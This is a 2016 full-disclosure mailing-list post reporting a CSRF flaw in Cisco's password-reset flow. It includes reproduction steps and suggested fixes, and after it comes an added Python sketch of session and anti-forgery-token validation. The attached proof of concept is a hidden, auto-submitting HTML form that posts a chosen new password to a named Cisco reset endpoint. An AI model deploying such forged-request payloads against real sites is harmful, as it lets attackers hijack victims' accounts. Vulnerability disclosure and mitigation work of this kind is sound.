List: full-disclosure
Subject: [FD] Security Vulnerability : Cisco web site CSRF in change password lead to full account take over
From: mohamed sayed <eng.mohamed8860 () gmail ! com>
Date: 2016-10-24 6:49:34
Message-ID: CABTCCWJ__0oG1pyRhmhd5bBGc1SkF=7r0z8j_T8qkzs-pX+TeQ () mail ! gmail ! com
Dear Team,
I hope this email finds you well. Please be informed that I found a major
security vulnerability in the main Cisco web site https://www.cisco.com/
*Introduction*
The vulnerability allows a remote hacker to force the victim's browser to send
a password reset for their account, and then the hacker will be able to take
ownership of this account.
----------------------
*Description and Steps To Reproduce the Issue*
1-Go to the main Cisco web site and create a new account
2-Click on forget password and then enter your email
3-An email address will be sent to your inbox... click the link to reset
your password
4-After capturing the request (attached), I found that it was sent with a
session token to open the web page,
but with the Confirmation - Sending Email, this session token wasn't sent,
plus there is no authorization code or anti-forgery token!
*This leads to a CSRF vulnerability on the back-end side*
5-By writing a very simple POC script to simulate this request... the hacker
will be able to change the password of the registered/logged-in victims in the
Cisco web application.
And by knowing his email he will be able to take his account easily!
------------------------
*Mitigation*
I'm suggesting the following solution to solve this issue:
1-In the *post* reset password action: the request should contain the session
token or authorization code, and the back-end side should validate that this
session is valid
2-An anti-forgery token should be added to the request parameters.
-------------------
Attached screenshots and simple POC (CISCO_ACCOUNT_OWNERSHIPT_CSRF.html)
to represent the issue.
If there is anything not clear, please let me know.
Looking forward to hearing from you soon :)
Regards
["CISCO_ACCOUNT_OWNERSHIP_CSRF (1).html" (text/html)]
<form id="f1" action="https://tools.cisco.com/IDPSWD/passwordResetSubmitAction.do" method="post">
<input type="hidden" name="user" value="guest"/>
<input type="hidden" name="pwdForm.newPwd" value="Ahmed_887203243"/>
<input type="hidden" name="pwdForm.reTypePwd" value="Ahmed_887203243"/>
</form>
<script type="text/javascript">
document.forms["f1"].submit();
</script>
["reset_password_1.jpg" (image/jpeg)]
["reset_password_2.jpg" (image/jpeg)]
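
The two mitigations suggested in the message above (validate the session on the reset POST, require an anti-forgery token), sketched as an added example that is not part of the original post and is not Cisco's code. The in-memory session store, the cookie name `session`, the field name `csrf_token` and the sample account are assumptions; the `pwdForm.*` and `user` field names come from the posted form.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret (constructed here)
SESSIONS = {}                         # session id -> account; stand-in for a real store


def csrf_token_for(session_id):
    # HMAC over the session id: a token issued for one session fails in any other.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def open_reset_session(account):
    """User followed the emailed reset link: start a session and return
    (session_id, csrf_token) to embed in the rendered reset form."""
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = account
    return session_id, csrf_token_for(session_id)


def handle_reset_post(cookies, form):
    """Validate the POST that changes the password. Returns (status, reason)."""
    session_id = cookies.get("session", "")
    account = SESSIONS.get(session_id)
    if account is None:
        return 401, "no valid session"
    supplied = form.get("csrf_token", "").encode()
    expected = csrf_token_for(session_id).encode()
    if not hmac.compare_digest(supplied, expected):  # constant-time compare
        return 403, "missing or wrong anti-forgery token"
    if form.get("pwdForm.newPwd") != form.get("pwdForm.reTypePwd"):
        return 400, "passwords do not match"
    # The account is taken from the server-side session, never from the form.
    del SESSIONS[session_id]          # reset session is single use
    return 200, "password changed for " + account


def demo():
    sid, token = open_reset_session("alice@example.test")  # constructed account
    pwd = {"pwdForm.newPwd": "constructed-Pw1", "pwdForm.reTypePwd": "constructed-Pw1"}
    # Cross-site form shaped like the posted one: no session, no token.
    forged = handle_reset_post({}, dict(pwd, user="guest"))
    # Browser attached the session cookie, but the other origin cannot read the token.
    forged_cookie = handle_reset_post({"session": sid}, dict(pwd, user="guest"))
    legit = handle_reset_post({"session": sid}, dict(pwd, csrf_token=token))
    replay = handle_reset_post({"session": sid}, dict(pwd, csrf_token=token))
    return forged, forged_cookie, legit, replay
```

The second forged case is the one the anti-forgery token exists for: the browser sends the cookie automatically, so the session check alone would pass.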